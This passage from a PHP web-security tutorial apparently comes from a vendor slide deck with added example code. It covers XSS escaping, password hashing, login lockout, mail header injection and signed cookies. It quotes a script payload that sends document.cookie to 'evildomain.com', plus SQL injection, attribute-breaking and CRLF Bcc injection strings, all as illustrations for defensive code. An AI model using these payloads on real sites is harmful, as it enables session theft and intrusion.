Note that escaping only protects values that are enclosed in quotes in the query. Numeric values should be cast to int instead, and identifiers (table or column names) cannot be protected by escaping at all; they must be checked against a whitelist.
8. XSS

XSS stands for Cross-Site Scripting and refers to injecting content, such as JavaScript, into a page that other users view. These attacks are commonly used to steal cookies, which often contain session identifiers that let the attacker act as the logged-in user. Example:

    $id = $_GET['id'];
    echo 'Displaying news item number ' . $id;

An attacker could craft a link whose id parameter contains:

    <script>window.location.href = "http://evildomain.com/cookie-stealer.php?c=" + document.cookie;</script>

If the attacker convinces a user to click that link, the script is echoed into the page unescaped and executed in the victim's browser, sending the victim's cookies to the attacker, who can then use them to log in as the user. It's really that simple.
Preventing XSS attacks

This attack works only because the application fails to escape output, so proper output escaping prevents it. PHP's strip_tags() removes HTML tags from a string, but it is not an escaping function: a value that contains no tag at all (for example a quote character followed by an onmouseover= attribute) passes through it unchanged and can still break out of an attribute. The correct approach is to run the value through htmlspecialchars() or htmlentities(), with ENT_QUOTES and the page's charset, at the point of output; this converts < and > to &lt; and &gt; (and quotes to &quot; and &#039;), so the browser displays the markup instead of executing it. Setting the HttpOnly flag on the session cookie additionally keeps document.cookie out of reach of any script that does get injected.
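The following is an added example, not code from the original deck, covering steps 4 and 8 together: the same untrusted value escaped for the three output contexts it most often reaches (HTML text or a quoted attribute, a URL query parameter, and a JavaScript literal), with the deck's cookie-stealing payload as the constructed input. It also shows why strip_tags() is not a substitute. It assumes PHP 7.3 or later (for JSON_THROW_ON_ERROR); the helper names eHtml, eUrl, eJs and renderNewsItem are this example's own.

```php
<?php
// Added example (not part of the original deck). Helper names are this example's own.
declare(strict_types=1);

/** Escape for HTML element content and for values inside quoted attributes. */
function eHtml(string $s): string
{
    // ENT_QUOTES escapes both ' and " so the value cannot close an attribute;
    // ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string;
    // the explicit charset must match the Content-Type the page is served with.
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/** Escape for a single query-string parameter value. */
function eUrl(string $s): string
{
    return rawurlencode($s);   // the finished URL still goes through eHtml when written into href
}

/** Escape for a JavaScript string literal inside a <script> block. */
function eJs(string $s): string
{
    // json_encode yields a quoted literal; the HEX flags turn < > & ' " into \uXXXX escapes,
    // so a value containing "</script>" cannot terminate the script block.
    return json_encode($s, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_THROW_ON_ERROR);
}

/** The deck's vulnerable echo, rewritten to escape per context. */
function renderNewsItem(string $untrustedId): string
{
    $html  = '<p>Displaying news item number ' . eHtml($untrustedId) . "</p>\n";
    $html .= '<a href="/news.php?id=' . eHtml(eUrl($untrustedId)) . '">permalink</a>' . "\n";
    $html .= '<script>var newsId = ' . eJs($untrustedId) . ";</script>\n";
    return $html;
}

// Constructed attacker input: the payload from the slide above.
$payload = '<script>window.location.href = "http://evildomain.com/cookie-stealer.php?c=" + document.cookie;</script>';
echo renderNewsItem($payload);

// Why strip_tags() is not an escaping function: this value contains no tag at all, so
// strip_tags() returns it unchanged, yet inside a quoted attribute it closes the quote
// and adds an event handler. eHtml() turns the quote into &quot; and the attribute stays intact.
$attrPayload = '" onmouseover="alert(document.cookie)';
echo '<a title="' . strip_tags($attrPayload) . '">unsafe</a>' . "\n";
echo '<a title="' . eHtml($attrPayload) . '">safe</a>' . "\n";
```

The rule the example encodes: escape at the point of output, and choose the escaper by where the value lands, not by where it came from. A value written into an href needs both URL encoding and HTML escaping, in that order.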
9. Passwords need to be stored securely

Sensitive information must never be kept in plain text. Passwords should not be stored at all, encrypted or otherwise: store a salted, slow password hash (password_hash() with bcrypt in PHP 5.5 and later, or crypt() with a per-user salt before that) and compare with password_verify(). A plain MD5 is not adequate: it is fast and unsalted, so leaked hashes are recovered with rainbow tables or GPU brute force. Data that must be recoverable, such as credit card numbers, should be encrypted with a proper algorithm and a key kept outside the database, or better, not stored at all. With this in place an attacker who obtains a copy of the database still cannot read users' passwords.

10. Lock-out functionality must be there for the login function

An attacker may keep brute-forcing the login until successful. To prevent this, after a given number of unsuccessful logins over a period of time the account and/or the source IP should be locked out for another given period. For example, 5 unsuccessful logins in 5 minutes may call for a lockout of 30 minutes for that IP/user. Lock by account as well as by IP: many users share one IP behind NAT, and attackers rotate addresses.
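The following is an added example, not code from the original deck, that puts steps 7, 9 and 10 into one login routine: a prepared statement with a bound username (so the deck's ' OR '1'='1 payload becomes just a wrong password), password_hash()/password_verify() instead of MD5, and the 5-failures-in-5-minutes, 30-minute lockout from step 10. It assumes PHP 7.1 or later with PDO and the pdo_sqlite driver; the schema, the user "rob", the time values and the thresholds are constructed for the demo, and in production you would point the DSN at your MySQL server and keep the same code.

```php
<?php
// Added example (not part of the original deck): one login routine applying steps 7, 9 and 10.
// Assumes PHP 7.1+ with PDO and pdo_sqlite; schema, user and thresholds are constructed for the demo.
declare(strict_types=1);

const MAX_FAILURES   = 5;     // failed attempts allowed ...
const FAILURE_WINDOW = 300;   // ... within this many seconds (5 minutes)
const LOCKOUT_TIME   = 1800;  // then lock the account for 30 minutes

function openDb(): PDO
{
    // In-memory SQLite so the example runs anywhere; swap the DSN for your MySQL server in production.
    $db = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
    $db->exec('CREATE TABLE site_users (username TEXT PRIMARY KEY, password_hash TEXT NOT NULL)');
    $db->exec('CREATE TABLE login_failures (username TEXT NOT NULL, failed_at INTEGER NOT NULL)');
    $db->exec('CREATE TABLE lockouts (username TEXT PRIMARY KEY, locked_until INTEGER NOT NULL)');
    return $db;
}

function registerUser(PDO $db, string $username, string $password): void
{
    // Step 9: store a salted, slow hash, never the password or an unsalted MD5 of it.
    // PASSWORD_DEFAULT is bcrypt today; password_verify() keeps working if the default changes.
    $hash = password_hash($password, PASSWORD_DEFAULT);
    $db->prepare('INSERT INTO site_users (username, password_hash) VALUES (:u, :h)')
       ->execute([':u' => $username, ':h' => $hash]);
}

function isLockedOut(PDO $db, string $username, int $now): bool
{
    $stmt = $db->prepare('SELECT locked_until FROM lockouts WHERE username = :u');
    $stmt->execute([':u' => $username]);
    $until = $stmt->fetchColumn();
    return $until !== false && (int) $until > $now;
}

function recordFailure(PDO $db, string $username, int $now): void
{
    // Step 10: remember the failure; once MAX_FAILURES fall inside FAILURE_WINDOW, lock the account.
    $db->prepare('INSERT INTO login_failures (username, failed_at) VALUES (:u, :t)')
       ->execute([':u' => $username, ':t' => $now]);
    $stmt = $db->prepare('SELECT COUNT(*) FROM login_failures WHERE username = :u AND failed_at > :since');
    $stmt->execute([':u' => $username, ':since' => $now - FAILURE_WINDOW]);
    if ((int) $stmt->fetchColumn() >= MAX_FAILURES) {
        $db->prepare('REPLACE INTO lockouts (username, locked_until) VALUES (:u, :t)')
           ->execute([':u' => $username, ':t' => $now + LOCKOUT_TIME]);
    }
}

function login(PDO $db, string $username, string $password, int $now): bool
{
    if (isLockedOut($db, $username, $now)) {
        return false;
    }
    // Step 7: the username is a bound parameter, so a value such as ' OR '1'='1 is compared as a
    // literal string and can never change the shape of the query. Only the hash is fetched;
    // the password is checked in PHP rather than in SQL.
    $stmt = $db->prepare('SELECT password_hash FROM site_users WHERE username = :u');
    $stmt->execute([':u' => $username]);
    $hash = $stmt->fetchColumn();
    $ok = $hash !== false && password_verify($password, $hash);
    if (!$ok) {
        recordFailure($db, $username, $now);
    }
    return $ok;
}

// Demo with constructed data. $t stands in for time() so the lockout can be stepped through.
$db = openDb();
registerUser($db, 'rob', 'correct horse battery staple');
$t = time();

$results = [
    'correct password'      => login($db, 'rob', 'correct horse battery staple', $t),
    'injection as password' => login($db, 'rob', "' OR '1'='1", $t),    // now just a wrong password
    'injection as username' => login($db, "rob' OR '1'='1", 'x', $t),   // no such user
];
for ($i = 1; $i <= 4; $i++) {   // four more wrong passwords for rob: five failures inside the window
    login($db, 'rob', 'wrong', $t + $i);
}
$results['right password while locked out']  = login($db, 'rob', 'correct horse battery staple', $t + 10);
$results['right password after lockout ends'] = login($db, 'rob', 'correct horse battery staple', $t + LOCKOUT_TIME + 10);
var_dump($results);
```

Two design points worth noting: the lockout is keyed by account, which is what protects rob when the attacker spreads attempts across many source addresses; and the query fetches only the stored hash, so even a future bug in the SQL layer cannot turn a comparison in the database into a bypass, because the comparison happens in password_verify().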
11. Email forms are vulnerable to email header injection

Input that ends up in mail headers (To, From, Subject, Reply-To) must be validated so that header injection cannot occur: a carriage return or line feed in such a field lets an attacker append headers of their own (for example extra Bcc recipients) and turn your contact form into a spam relay. Reject or strip CR and LF characters, validate addresses, and use a CAPTCHA on the mail form to limit automated submission.
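An added example, not from the original deck, of the header check described above: each header-bound field is refused if it contains CR, LF or NUL, addresses are validated, and a constructed attacker value shows the extra Bcc line that naive concatenation would have injected. Function names are this example's own; mail() itself is not called, so the snippet runs without a mail server.

```php
<?php
// Added example (not part of the original deck). Function names are this example's own.
declare(strict_types=1);

/**
 * Return the field if it is safe to place in a mail header, or null if it contains a line
 * break or NUL. CR/LF is exactly what lets an attacker start a header of their own.
 */
function headerField(string $value, int $maxLen = 998): ?string
{
    if (strlen($value) > $maxLen || preg_match('/[\r\n\0]/', $value) === 1) {
        return null;
    }
    return trim($value);
}

/** Validate an address for From/Reply-To (FILTER_VALIDATE_EMAIL rejects embedded CR/LF as well). */
function headerAddress(string $value): ?string
{
    $ok = filter_var(trim($value), FILTER_VALIDATE_EMAIL);
    return $ok === false ? null : $ok;
}

/** Build the additional_headers string for mail(), or null if any field is unsafe. */
function buildHeaders(string $fromName, string $fromEmail): ?string
{
    $name  = headerField($fromName);
    $email = headerAddress($fromEmail);
    if ($name === null || $email === null) {
        return null;
    }
    // Encode the display name so a double quote or high-bit byte cannot break the header either.
    return 'From: =?UTF-8?B?' . base64_encode($name) . "?= <$email>\r\n"
         . "Reply-To: $email\r\n";
}

// Constructed form submissions. The second is the classic attack: a line break followed by a
// Bcc header, which with naive concatenation would send the message to the attacker's list.
$benign = ['name' => 'Bob Example', 'email' => 'bob@example.com'];
$attack = ['name' => 'Bob', 'email' => "bob@example.com\r\nBcc: victim1@example.org, victim2@example.org"];

var_dump(buildHeaders($benign['name'], $benign['email']));   // a well-formed header block
var_dump(buildHeaders($attack['name'], $attack['email']));   // null: the submission is refused
```

Refusing the submission outright is preferable to silently stripping the line breaks: a field that contains them is an attack, not a typo, and it is worth logging.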
12. Using Cookies Securely

Cookies are an easy and useful way to keep user-specific information available. However, because cookies are stored on the user's computer and sent with every request, they can be read, modified (spoofed) or stolen. Follow these guidelines:
- Do not store any critical information in cookies. For example, do not store a user's password in a cookie, even temporarily. As a rule, do not store any sensitive information in a cookie; store a random session identifier and keep the data server-side.
- Set expiration dates on cookies to the shortest practical time. Avoid permanent cookies if possible.
- Consider encrypting information in cookies, and sign it (HMAC) so that tampering is detected.
- Set the Secure flag (cookie only sent over HTTPS) and the HttpOnly flag (cookie not readable from JavaScript) on your cookies.
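An added example, not from the original deck, putting the cookie guidelines above into code: the session cookie gets Secure, HttpOnly and SameSite, and an application cookie that must carry data is protected with an HMAC so tampering is detected on the way back in. It assumes PHP 7.3 or later for the array form of setcookie() and session_set_cookie_params(); the function names and the demo key are this example's own (in production the key comes from configuration, never from source).

```php
<?php
// Added example (not part of the original deck). Function names and the demo key are this example's own.
declare(strict_types=1);

/** Session cookie: no life beyond the browser session, HTTPS only, not readable by script. */
function configureSessionCookie(): void
{
    session_set_cookie_params([
        'lifetime' => 0,        // expires when the browser closes
        'path'     => '/',
        'domain'   => '',
        'secure'   => true,     // never sent over plain HTTP
        'httponly' => true,     // invisible to document.cookie, so XSS cannot read it
        'samesite' => 'Lax',    // not sent on cross-site POSTs (CSRF mitigation)
    ]);
    ini_set('session.use_strict_mode', '1');   // refuse session IDs the server did not issue
}

/** Sign a value with HMAC-SHA256 so the browser cannot alter it unnoticed. */
function signedValue(string $value, string $key): string
{
    $mac = hash_hmac('sha256', $value, $key);
    return base64_encode($value) . '.' . $mac;   // base64 and hex never contain '.', so it is a safe separator
}

/** Verify and unwrap a signed value; null if missing, malformed or tampered with. */
function verifiedValue(?string $cookie, string $key): ?string
{
    if ($cookie === null || substr_count($cookie, '.') !== 1) {
        return null;
    }
    [$encoded, $mac] = explode('.', $cookie, 2);
    $value = base64_decode($encoded, true);
    if ($value === false) {
        return null;
    }
    // hash_equals: constant-time comparison, so the MAC cannot be guessed byte by byte
    return hash_equals(hash_hmac('sha256', $value, $key), $mac) ? $value : null;
}

/** Set a short-lived, signed, non-sensitive preference cookie (no password, no personal data). */
function setPreferenceCookie(string $name, string $value, string $key): void
{
    setcookie($name, signedValue($value, $key), [
        'expires'  => time() + 3600,   // one hour: the shortest practical lifetime for this use
        'path'     => '/',
        'secure'   => true,
        'httponly' => true,
        'samesite' => 'Lax',
    ]);
}

// Demo with a constructed key. Changing either part of the cookie must be detected.
configureSessionCookie();
$key      = 'demo-only-key-load-from-config-in-production';
$cookie   = signedValue('theme=dark', $key);
$tampered = base64_encode('theme=admin') . '.' . explode('.', $cookie)[1];

var_dump(verifiedValue($cookie, $key));     // the original value
var_dump(verifiedValue($tampered, $key));   // null: the MAC no longer matches
var_dump(verifiedValue('garbage', $key));   // null: malformed
```

The HMAC gives integrity, not confidentiality: the value is still readable by anyone holding the cookie, which is why nothing sensitive belongs in it in the first place. If a value must be both hidden and tamper-proof, encrypt it with an authenticated mode (sodium_crypto_secretbox in PHP 7.2+) instead.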
For further queries contact us or call 1-248-686-1424, www.mindfiresolutions.com